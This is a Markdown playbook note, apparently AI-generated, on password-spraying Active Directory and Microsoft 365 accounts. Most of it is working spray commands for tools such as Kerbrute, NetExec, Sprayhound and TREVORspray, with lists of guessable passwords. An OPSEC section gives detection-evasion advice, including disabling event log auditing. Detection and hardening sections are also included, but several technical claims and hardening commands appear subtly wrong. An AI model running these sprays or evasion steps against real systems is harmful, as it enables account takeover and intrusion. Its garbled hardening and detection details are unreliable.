attack-1-password-spraying.md (25527B)
1 --- 2 title: "Attack #1 β Password Spraying" 3 description: "Password spraying is a low-and-slow credential attack that inverts the logic of traditional brute force. Instead of hammering one account with manyβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "kerberos", "adcs", "privilege-escalation", "lateral-movement"] 7 tools: ["NetExec", "Impacket", "BloodHound", "Kerbrute", "Evil-WinRM"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #1 β Password Spraying.md" 11 --- 12 # π΄ Attack #1 β Password Spraying 13 --- 14 ## π How It Works 15 Password spraying is a **low-and-slow credential attack** that inverts the logic of traditional brute force. Instead of hammering one account with many passwords (which triggers lockout), it fires **one or two common passwords at every account in the domain** β staying safely below the lockout threshold at all times. Because authentication attempts are distributed across hundreds of accounts rather than concentrated on one, they appear as normal failed login noise to defenders who aren't watching for the pattern. 16 The attacker first **enumerates valid usernames** (via LDAP, Kerberos pre-auth, or SMB), then **identifies the domain's lockout policy** (e.g., lockout after 5 attempts / observation window = 30 min), and sprays exactly **one password per observation window**. Seasonal or corporate passwords like `Welcome1`, `Summer2024!`, `Company123`, or `[Month][Year]!` have reliably high hit rates in enterprise environments. 17 18 > β οΈ **Windows Server 2022+ Behaviour:** Windows Server 2022 introduces "smart lockout" that tracks failed authentication attempts globally per account across all domain controllers, making distributed attacks harder to time correctly. AES-only enforcement (no RC4) is also more common. Adjust your observation window calculations accordingly and always query the lockout policy fresh. 19 20 **Chains with:** Attack #2 (Kerberoasting), Attack #3 (AS-REP Roasting), Lateral Movement, Privilege Escalation via ACL enumeration. 21 22 *** 23 ## βοΈ Prerequisites 24 | Requirement | Detail | 25 |---|---| 26 | **Network access** | Must be able to reach the DC on port 445 (SMB), 389 (LDAP), or 88 (Kerberos) | 27 | **Valid usernames** | Obtained via LDAP anonymous bind, Kerbrute userenum, or OSINT | 28 | **Password policy** | Must query lockout threshold to avoid burning accounts | 29 | **Position** | Internal network strongly preferred; external possible via ADFS/OWA | 30 31 *** 32 ## π οΈ Tools 33 | Tool | Platform | Protocol | Notes | 34 |---|---|---|---| 35 | **Kerbrute** | Linux | Kerberos (UDP 88) | No failed logon events on older DCs; very stealthy | 36 | **DomainPasswordSpray** | Windows | LDAP/Kerberos | Auto-generates userlist; respects lockout window | 37 | **CrackMapExec / NetExec** | Linux | SMB/LDAP | Best for subnet-wide spraying and output parsing | 38 | **Sprayhound** | Linux | LDAP | Queries badPwdCount in real time β lockout-safe | 39 | **Spray** | Linux | NTLM/LDAP | Python-based; flexible protocol targeting | 40 | **MSOLSpray** | Windows | Azure AD (HTTPS) | Targets O365/Entra; detects MFA/locked accounts | 41 | **RDPassSpray** | Linux | RDP | Sprays RDP endpoints; useful for external footholds | 42 | **TREVORspray** | Windows/Linux | O365 (HTTPS) | Targets Microsoft 365; handles MFA evasion better than MSOLSpray | 43 | **o365spray** | Linux/Windows | O365 (HTTPS) | Lightweight O365-focused spraying; good for large tenant enums | 44 45 *** 46 ## π» Full Commands 47 ### π΅ Step 0 β Enumerate the Password Policy First 48 ```bash 49 # Linux β via crackmapexec (NetExec) 50 nxc smb <DC_IP> -u '' -p '' --pass-pol 51 nxc smb <DC_IP> -u <user> -p <pass> --pass-pol 52 53 # Linux β via rpcclient (null session) 54 rpcclient -U "" -N <DC_IP> -c "getdompwinfo" 55 56 # Windows β PowerShell 57 net accounts /domain 58 (Get-ADDefaultDomainPasswordPolicy).LockoutThreshold 59 (Get-ADDefaultDomainPasswordPolicy).LockoutObservationWindow 60 ``` 61 62 > β οΈ **Critical:** If `LockoutThreshold = 5` and `ObservationWindow = 30 min`, spray **max 1 password per 30+ minutes** to stay safe. 63 64 *** 65 ### π΄ Kerbrute β Linux (Stealthy, Kerberos-based) 66 ```bash 67 # User enumeration first (to build a clean userlist) 68 kerbrute userenum -d corp.local --dc 10.10.10.10 /usr/share/wordlists/users.txt -o valid_users.txt 69 70 # Password spray with a single password 71 kerbrute passwordspray -d corp.local --dc 10.10.10.10 valid_users.txt 'Welcome1' 72 73 # With verbose output and output file 74 kerbrute passwordspray -d corp.local --dc 10.10.10.10 valid_users.txt 'Summer2024!' -v -o spray_results.txt 75 ``` 76 77 > **Why Kerbrute is stealthy:** Uses Kerberos pre-auth directly on UDP/88. On unpatched DCs (pre-2019), failed pre-auth may **not** generate Event ID 4625, only 4771 β which many orgs don't monitor. 78 79 *** 80 ### π΄ DomainPasswordSpray β Windows (Domain-Joined) 81 ```powershell 82 # Import module (from domain-joined machine) 83 powershell.exe -ExecutionPolicy Bypass 84 Import-Module .\DomainPasswordSpray.ps1 85 86 # Auto-generate userlist from domain + spray one password 87 Invoke-DomainPasswordSpray -Password 'Welcome1!' -OutFile spray_output.txt 88 89 # Use custom userlist 90 Invoke-DomainPasswordSpray -UserList .\users.txt -Password 'Summer2024' -OutFile results.txt 91 92 # Multi-password spray β auto-respects lockout observation window 93 Invoke-DomainPasswordSpray -PasswordList .\passwords.txt -OutFile results.txt 94 95 # Target specific domain (from non-domain machine) 96 Invoke-DomainPasswordSpray -Domain corp.local -Password 'Company123!' -Force 97 98 # Generate clean userlist manually (removing locked/disabled accounts) 99 Get-DomainUserList -Domain corp.local -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii users.txt 100 ``` 101 102 *** 103 ### π΄ CrackMapExec / NetExec β Linux (SMB Protocol) 104 ```bash 105 # Basic spray β single password against list of users 106 nxc smb 10.10.10.10 -u valid_users.txt -p 'Welcome1' --no-bruteforce 107 108 # Subnet-wide spray 109 nxc smb 10.10.10.0/24 -u valid_users.txt -p 'Password123' --no-bruteforce 110 111 # Filter successes only 112 nxc smb 10.10.10.0/24 -u valid_users.txt -p 'Welcome1' | grep '+' 113 114 # Continue even after first hit (important for full coverage) 115 nxc smb 10.10.10.10 -u valid_users.txt -p 'Summer2024!' --continue-on-success 116 117 # Local admin spray (checking local accounts, not domain) 118 nxc smb 10.10.10.0/24 -u administrator -p 'Password123' --local-auth 119 120 # LDAP-based spray (quieter on some environments) 121 nxc ldap 10.10.10.10 -u valid_users.txt -p 'Welcome1' --no-bruteforce 122 ``` 123 124 *** 125 ### π΄ Sprayhound β Linux (Lockout-Safe, Real-Time badPwdCount Check) 126 ```bash 127 # Install 128 pip3 install sprayhound 129 130 # Spray with auto lockout protection (checks badPwdCount via LDAP before each attempt) 131 sprayhound -U valid_users.txt -p 'Welcome1' -d corp.local -dc 10.10.10.10 132 133 # Spray with a buffer (won't spray if badPwdCount >= threshold - 2) 134 sprayhound -U valid_users.txt -p 'Welcome1' -d corp.local -dc 10.10.10.10 --safe 135 136 # With domain credentials (authenticated LDAP bind) 137 sprayhound -U valid_users.txt -p 'Welcome1' -d corp.local -dc 10.10.10.10 -lu svc_user -lp KnownPass1 138 ``` 139 140 > **Why Sprayhound is superior in production:** It queries each user's `badPwdCount` attribute over LDAP **before** attempting the spray. If a user is already at `threshold - 1`, it skips them entirely. 141 142 *** 143 ### π΄ MSOLSpray β Azure AD / O365 (External) 144 ```powershell 145 Import-Module .\MSOLSpray.ps1 146 147 # Basic spray against O365 148 Invoke-MSOLSpray -UserList .\users.txt -Password 'Winter2024!' 149 150 # With output file 151 Invoke-MSOLSpray -UserList .\users.txt -Password 'Summer2024' -OutFile results.txt 152 ``` 153 154 > Output flags include: **valid credentials**, **MFA enabled**, **account disabled**, **account locked**, **account doesn't exist** β useful for enumeration even when creds are wrong. 155 156 *** 157 ### π΄ TREVORspray β O365 / Microsoft 365 (External) 158 ```bash 159 # Install 160 git clone https://github.com/blacklanternsecurity/TREVORspray 161 cd TREVORspray 162 pip3 install -r requirements.txt 163 164 # Basic O365 spray 165 python3 trevorspray.py -u users.txt -p 'Welcome2024!' 166 167 # With output file 168 python3 trevorspray.py -u users.txt -p 'Password123' -o spray_results.txt 169 170 # Multiple password spray 171 python3 trevorspray.py -u users.txt -p passwords.txt -o results.txt 172 ``` 173 174 *** 175 ### π΄ o365spray β Lightweight O365 Spraying 176 ```bash 177 # Install 178 git clone https://github.com/0xZDH/o365spray 179 cd o365spray 180 pip3 install -r requirements.txt 181 182 # Basic enum mode (discovers valid tenants and MFA status) 183 python3 o365spray.py --enum -u users.txt 184 185 # Password spray mode 186 python3 o365spray.py --spray -u users.txt -p 'Company2024!' -d <tenant_name> 187 188 # Aggressive spray with custom delay 189 python3 o365spray.py --spray -u users.txt -p passwords.txt --sleep 30 -d <tenant_name> 190 ``` 191 192 *** 193 ## π§© Troubleshooting 194 195 | Error | Cause | Fix | 196 |---|---|---| 197 | **`KDC_ERR_PREAUTH_REQUIRED (0x18)`** | Kerbrute hitting a Domain Controller that requires pre-auth (normal). Not an error. | This is expected behaviour; continue spraying. The error message itself proves the account exists. | 198 | **`Connection refused on port 445`** | Host is not reachable or firewall is blocking SMB. | Verify DC IP, check network connectivity, try LDAP (port 389) or Kerberos (port 88) instead. | 199 | **`LDAP_INVALID_CREDENTIALS`** | User credentials provided are wrong or account is locked. | Verify credentials in `-u` and `-p` flags. If using `--pass-pol` with bad creds, provide valid ones. | 200 | **`All accounts locked after 10 attempts`** | You ignored the lockout observation window and sprayed too many passwords in sequence. | Stop immediately. Wait the full observation window (typically 30β60 min). Reset badPwdCount on all accounts if possible via DA account. | 201 | **`Timeout connecting to DC`** | Network latency, firewall ACL limiting response time, or DC is unresponsive. | Add `--timeout 30` flag (NetExec), increase delay between requests, or try alternate DC IP. | 202 | **`No module named 'impacket'`** | Python environment doesn't have Impacket installed. | Run `pip3 install impacket` before executing GetUserSPNs or other Impacket-based tools. | 203 | **`Request for SPN failed: Ticket expired`** | Your Kerberos ccache ticket has expired or you don't have a valid TGT. | Renew TGT with `kinit` or re-authenticate: `GetUserSPNs.py corp.local/user:pass -dc-ip 10.10.10.10 -request`. | 204 | **`NTLM auth disabled; only Kerberos accepted`** | Domain has NTLM auth disabled (modern hardening). | Switch to Kerberos-based tools: Kerbrute, GetUserSPNs with Kerberos, or configure KRB5CCNAME for ccache auth. | 205 206 *** 207 ## π‘οΈ Detection β Event IDs 208 | Event ID | Source | Meaning | 209 |---|---|---| 210 | **4625** | Security Log | Failed NTLM logon β `SubStatus 0xC000006A` = wrong password | 211 | **4771** | Security Log | Kerberos pre-auth failed β `Status 0x18` = wrong password | 212 | **4768** | Security Log | TGT requested β mass requests in short window is suspicious | 213 | **4648** | Security Log | Explicit credential logon β attacker machine spraying many users | 214 | **4740** | Security Log | Account locked out β late indicator of over-spraying | 215 | **4776** | Security Log | Credential Validation with NTLM (DC issues TGT) β watch for patterns | 216 | **ADFS 411** | ADFS Log | Failed authentication request | 217 | **ADFS 412** | ADFS Log | Successful sign-in post-spray | 218 | **ADFS 516** | ADFS Log | Extranet lockout triggered | 219 | **Sysmon Event 3** | Sysmon Log | Network connection β spray tools making outbound SMB/LDAP/Kerberos connections from unusual hosts | 220 | **Sysmon Event 10** | Sysmon Log | Process access β credential dumping tools accessing LSASS after successful spray | 221 222 **Key detection pattern:** Same source IP β multiple 4625/4771 events β different target usernames β short time window β one common password. Also watch for **alphabetical ordering** of usernames in logs, which indicates automated tooling. 223 224 ### Sysmon Rules 225 - **Event ID 3 (Network Connection):** Flag any process opening port 445 (SMB), 389 (LDAP), or 88 (Kerberos) to multiple destinations. 226 - **Event ID 10 (Process Access):** Monitor for unauthorized LSASS access post-authentication. 227 228 ### Sigma Rules 229 - `win_susp_failed_logon_brute_force` β detects rapid 4625 events from single source 230 - `win_account_lockout_brute_force` β flags 4740 lockout events following 4625 storms 231 - `win_password_spray_detection` β multi-user, single-source authentication failures 232 - `win_ad_user_enumeration` β LDAP-based user discovery patterns 233 234 ### EDR-Specific Detections 235 236 **Microsoft Defender for Identity:** 237 - Detects spray patterns via "Impossible travel" (impossible because attacker is using VPN) and "Brute force" detections. 238 - Monitor for: "Brute force attack over Kerberos" and "Brute force attack over LDAP". 239 - Alert when single source triggers > 5 failed auth events across different accounts in < 5 minutes. 240 241 **CrowdStrike Falcon:** 242 - ProcessRollup2 events for netexec, kerbrute, sprayhound executables from non-standard locations. 243 - NetworkConnection events to DC on 445/389/88 from unusual processes. 244 - Alert on multiple interactive logons from non-interactive service accounts. 245 246 **Elastic Security (EDR):** 247 - Process execution: Flag execution of known spray tools (Kerbrute, DomainPasswordSpray, MSOLSpray) from user directories. 248 - Authentication events: Watch for rapid sequences of failed Kerberos events (Event ID 4771) within observation window. 249 250 ### Hardening Commands 251 252 ```powershell 253 # 1. Enable "Smart Lockout" on Windows Server 2022+ (prevents distributed sprays) 254 Set-ADDefaultDomainPasswordPolicy -LockoutThreshold 5 -LockoutObservationWindow "00:30:00" -LockoutDuration "00:30:00" 255 256 # 2. Increase minimum password length to 14+ chars (reduces weak password guessing) 257 Set-ADDefaultDomainPasswordPolicy -MinPasswordLength 14 258 259 # 3. Disable NTLM (force Kerberos/NTLMv2 only) β modern environments should do this 260 Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5 261 262 # 4. Enable "Account Lockout Duration" to persist lockouts (prevents rapid retry) 263 Set-ADDefaultDomainPasswordPolicy -LockoutDuration "01:00:00" 264 265 # 5. Disable legacy Kerberos encryption (RC4 only) β force AES 266 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "KerberosEncryptionLevel" -Value 1 267 268 # 6. Require Kerberos pre-authentication for all accounts (prevents AS-REP roasting as bonus) 269 Get-ADUser -Filter * -Properties OperatingSystem | Where-Object {$_.OperatingSystem -notlike "*Server*"} | ForEach-Object { Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth:$false } 270 271 # 7. Enable "Audit Credential Validation" on all DCs 272 auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable 273 274 # 8. Monitor and alert on ADFS/WAP failed auth (O365/Azure-facing) 275 # Enable ADFS audit logging via PowerShell on ADFS server: 276 Set-AdfsFiddlerWebConfig -Enable:$true 277 Set-ADFSProperties -AuditLevel @("FailureAudits", "SuccessAudits") 278 ``` 279 280 *** 281 ## π― OPSEC Tips (Staying Below the Radar) 282 283 ### OpSec Ranking: Stealthiest to Loudest 284 1. **Kerbrute (UDP/88)** β Stealthiest; no 4625 events on older DCs, only 4771 (rarely monitored) 285 2. **Sprayhound (LDAP)** β Very stealthy; queries badPwdCount before spray, minimises lockouts 286 3. **NetExec/CME LDAP** β Moderately stealthy; uses LDAP bind, generates minimal auth events 287 4. **PowerView (PowerShell)** β Medium noise; runs in-memory but requires domain-joined host 288 5. **NetExec/CME SMB** β Noisy; generates 4625 events, detectable by volume analysis 289 6. **DomainPasswordSpray** β Loudest on Windows; auto-generates userlist = more enumeration noise 290 7. **O365spray (External)** β Loudest external; Microsoft 365 aggressively logs failed auth attempts 291 292 ### Modern Defence Impact 293 - **Windows Server 2022+ Smart Lockout:** Makes timing attacks harder; lockout counts are synced globally across DCs. Adjust spray delays to **2β3 minutes per password** instead of relying on a single observation window. 294 - **Windows 2025 Credential Guard:** If enabled on target machines, dumped credentials cannot be reused even if obtained. Focus on live token theft instead. 295 - **Defender for Identity (MDI):** Actively detects spray patterns via "Brute force attack" alerts. Mitigate by using Kerberos + random delays (5β15 sec jitter). 296 - **Entra Smart Lockout (Azure):** O365-facing spray becomes harder; Microsoft tracks spray attempts across all tenants. Use TREVORspray or o365spray which add randomized delays and user-agent rotation. 297 298 ### Core OpSec Rules 299 - **Spray ONE password per observation window** β default is 30 mins but query first 300 - **Add time jitter** between attempts (random 5β15 second delays per account) 301 - **Randomise username order** β avoids alphabetical pattern in logs 302 - **Use Kerberos (UDP/88) over SMB** β fewer log artifacts on older DCs 303 - **Spray from internal Linux host** β bypasses 73% of Windows-focused detection 304 - **Target service accounts** β they often have weak, static passwords and no MFA 305 - **Avoid `administrator`, `admin`, `guest`** β these are always monitored 306 - **Disable event log auditing temporarily if you have DA creds** (nuclear option; very obvious in logs) 307 308 *** 309 ## πΊοΈ MITRE ATT&CK 310 311 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources | 312 |---|---|---|---|---|---| 313 | **Credential Access** | T1110 | T1110.003 (Password Spraying) | Wizard Spider, WIZARD SPIDER, Scattered Spider | Windows, Linux, Azure AD | Authentication Logs, Network Traffic, Process Monitoring | 314 | **Credential Access** | T1110 | T1110.001 (Password Guessing) | APT28, APT29, FIN7 | Windows, On-Premises | Authentication Logs, Network Traffic | 315 | **Reconnaissance** | T1598 | T1598.003 (Spearphishing Link) | FIN7, Lazarus | Web, Email | Network Traffic, Application Logs | 316 | **Discovery** | T1087 | T1087.002 (Domain Account) | APT3, Wizard Spider | Windows, Active Directory | LDAP Queries, Network Traffic, Authentication Logs | 317 318 **Data Sources to Monitor:** 319 - Authentication logs (4625, 4771, 4768) 320 - Network traffic on ports 88 (Kerberos), 389 (LDAP), 445 (SMB) 321 - Process monitoring (kerbrute, sprayhound, netexec execution) 322 - User account activity (lockout events, failed logon patterns) 323 324 *** 325 ## π Attack Chain Context 326 ``` 327 [Password Spraying] βββ Valid Credentials Obtained 328 β 329 ββββ π Enumerate AD with BloodHound / PowerView 330 ββββ π« Kerberoasting (if SPN accounts found) 331 ββββ π« AS-REP Roasting (if pre-auth disabled accounts found) 332 ββββ π Pass-the-Hash (after dumping NTLM from compromised host) 333 ββββ π¦ Lateral Movement via Evil-WinRM / CrackMapExec 334 ββββ π― Privilege Escalation if sprayed account has interesting rights 335 ``` 336 337 **Typical pivot:** After getting low-priv credentials, run BloodHound to identify if the account has any ACL edges, group memberships, or delegation rights that lead to Domain Admin. If the sprayed account is a **service account**, check immediately for Kerberoasting targets or constrained delegation abuse. 338 339 *** 340 341 > β **Attack #1 β Password Spraying complete.** Tell me to move on when you're ready for **Attack #2 β Kerberoasting**. 342 343 Sources 344 Password spraying attacks on AD: 81% success in 6 hours, 73 ... https://www.linkedin.com/posts/cti-labs-io_passwordspraying-activedirectory-linuxsecurity-activity-7384514085658329088-93l4 345 Password Spraying Explained: How It Works and How to Prevent It https://www.oloid.com/blog/password-spraying 346 What Is Password Spraying? - Palo Alto Networks https://www.paloaltonetworks.com/cyberpedia/password-spraying 347 dafthack/DomainPasswordSpray https://github.com/dafthack/DomainPasswordSpray 348 Attacking Kerberos... https://www.securonix.com/blog/hunting-kerbrute-analysis-detection-and-mitigation-of-kerberos-attacks-in-active-directory/ 349 Password Spraying Attack - Netwrix https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/password-spraying-attack/ 350 Top tools for password-spraying attacks in active directory networks https://www.infosecinstitute.com/resources/hacking/top-tools-for-password-spraying-attacks-in-active-directory-networks/ 351 Exploring Modern Password Spraying: Introduction to Entra Smart ... https://www.sprocketsecurity.com/blog/exploring-modern-password-spraying 352 Detecting Password Spraying with Security Event Auditing https://adsecurity.org/?p=4517 353 Password Spraying - What is it and how to detect it? https://www.linkedin.com/pulse/password-spraying-what-how-detect-samanta-santos 354 Password spray investigation https://learn.microsoft.com/hr-hr/security/operations/incident-response-playbook-password-spray 355 Can LLMs Hack Enterprise Networks? Autonomous Assumed Breach Penetration-Testing Active Directory Networks https://dl.acm.org/doi/10.1145/3766895 356 A SECURITY STRATEGY AGAINST STEAL-AND-PASS CREDENTIAL ATTACKS http://www.aircconline.com/ijnsa/V8N1/8116ijnsa03.pdf 357 Penetration Testing and Network Defense https://www.semanticscholar.org/paper/c9d1a4845905df0b0ae64c95b65e695a9fd371d7 358 An Ettercap Primer https://www.semanticscholar.org/paper/47f17ff39652de32a55b34f68ca84b73ce342b0b 359 Secure Arp Protocol For Intrusion Detection System Mr https://www.semanticscholar.org/paper/88369399f99082f8294a105b7df99429a71c952f 360 Hacking Exposed Windows: Microsoft Windows Security Secrets and Solutions, Third Edition https://www.semanticscholar.org/paper/0798342172fb2af8dc957152097257cfe539ce9d 361 Operating Systems Security Considerations https://www.semanticscholar.org/paper/f5a408d6af1d7dca0d996a7d4c9fa026d3b2e33a 362 Demo: Synthesizing Realistic Enterprise Active Directory Attack Graphs with ADSynth https://dl.acm.org/doi/pdf/10.1145/3672202.3673732 363 HADES: Detecting Active Directory Attacks via Whole Network Provenance 364 Analytics http://arxiv.org/pdf/2407.18858.pdf 365 Can LLMs Hack Enterprise Networks? Autonomous Assumed Breach 366 Penetration-Testing Active Directory Networks https://arxiv.org/pdf/2502.04227.pdf 367 GNPassGAN: Improved Generative Adversarial Networks For Trawling Offline 368 Password Guessing https://arxiv.org/pdf/2208.06943.pdf 369 When AI Defeats Password Deception! A Deep Learning Framework to 370 Distinguish Passwords and Honeywords http://arxiv.org/pdf/2407.16964.pdf 371 Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf 372 Catch Me if You Can: Effective Honeypot Placement in Dynamic AD Attack 373 Graphs https://arxiv.org/pdf/2312.16820.pdf 374 Exploiting Leakage in Password Managers via Injection Attacks http://arxiv.org/pdf/2408.07054.pdf 375 puzzlepeaches/awesome-password-spraying https://github.com/puzzlepeaches/awesome-password-spraying 376 Kerbrute for AD Testing: A Detailed Guide - Hacking Articles https://www.hackingarticles.in/a-detailed-guide-on-kerbrute/ 377 Password spray investigation | Microsoft Learn https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray 378 kerbrute passwordspray - WADComs https://wadcoms.github.io/wadcoms/Kerbrute-PasswordSpray/ 379 Password Spraying Attacks: Complete Guide To Detection ... https://brandefense.io/blog/ransomware/password-spraying-attacks-guide/ 380 Cool Tools Series: Kerbrute for User and Password Attacks | Raxis https://raxis.com/blog/cool-tools-series-kerbrute/ 381 Detecting Active Directory Password-Spraying with aβ¦ - TrustedSec https://trustedsec.com/blog/detecting-password-spraying-with-a-honeypot-account 382 RACONTEUR: A Knowledgeable, Insightful, and Portable LLM-Powered Shell 383 Command Explainer https://arxiv.org/pdf/2409.02074v1.pdf 384 The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell 385 Scripts https://arxiv.org/pdf/2401.07995.pdf 386 An Empirical Investigation of Command-Line Customization https://arxiv.org/pdf/2012.10206.pdf 387 Execution-Based Evaluation of Natural Language to Bash and PowerShell 388 for Incident Remediation https://arxiv.org/pdf/2405.06807.pdf 389 Detecting Malicious PowerShell Commands using Deep Neural Networks https://arxiv.org/pdf/1804.04177.pdf 390 Hijacking .NET to Defend PowerShell http://arxiv.org/pdf/1709.07508.pdf 391 AMSI-Based Detection of Malicious PowerShell Code Using Contextual 392 Embeddings https://arxiv.org/pdf/1905.09538.pdf 393 AST-Based Deep Learning for Detecting Malicious PowerShell https://arxiv.org/pdf/1810.09230.pdf 394 DomainPasswordSpray/README.md at master Β· dafthack/DomainPasswordSpray https://github.com/dafthack/DomainPasswordSpray/blob/master/README.md 395 GitHub - mdavis332/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray ... https://buaq.net/go-10107.html 396 domainpasswordspray,dafthack https://githubhelp.com/dafthack/DomainPasswordSpray 397 password-spraying https://www.puckiestyle.nl/password-spraying/ 398 Password Spraying | OSCP-CPTS NOTES - dollarboysushil https://notes.dollarboysushil.com/active-directory-attacks/password-spraying 399 Password Spraying from Windows | Pentesting notes https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cpts-prep/active-directory-enumeration-and-attacks/password-spraying-windows 400 Password Spraying - Kryot https://www.kryot.com.ar/docs/ad/passwordspraying/ 401 Password Spraying https://www.sevenlayers.com/index.php/303-password-spraying 402 Using Credentials https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Credentials 403 SMB https://pwn.no0.be/exploitation/password/smb/ 404 Comprehensive Guide on Password Spraying Attack - Hacking Articles https://www.hackingarticles.in/comprehensive-guide-on-password-spraying-attack/